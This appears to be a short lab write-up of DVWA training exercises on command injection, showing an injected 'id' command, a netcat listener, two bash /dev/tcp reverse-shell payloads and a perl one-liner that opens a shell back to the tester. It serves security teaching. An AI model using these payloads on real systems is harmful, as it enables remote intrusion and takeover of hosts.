DVWA Exercises 2
03. Command Injection

Let's try to ping our host
172.17.0.1

Lets try to inject another command
172.17.0.1; id

04. Command Injection Reverse Shell
Let's search for a nice cheat sheet:

As you can see we get different payloads here. Let's try a bash reverse shell first:
Setup a netcat listener on port 8001
nc -lvnp 8001

Attack payload for bash TCP:
; bash -i >& /dev/tcp/172.17.0.1/8001 0>&1
; /bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1

Both didn't work! I can't see any incoming connection on my netcat listener...
Let's try another one with perl:
perl -e 'use Socket;$i="172.17.0.1";$p=8001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

And we have a reverseshell :)

Last updated
Was this helpful?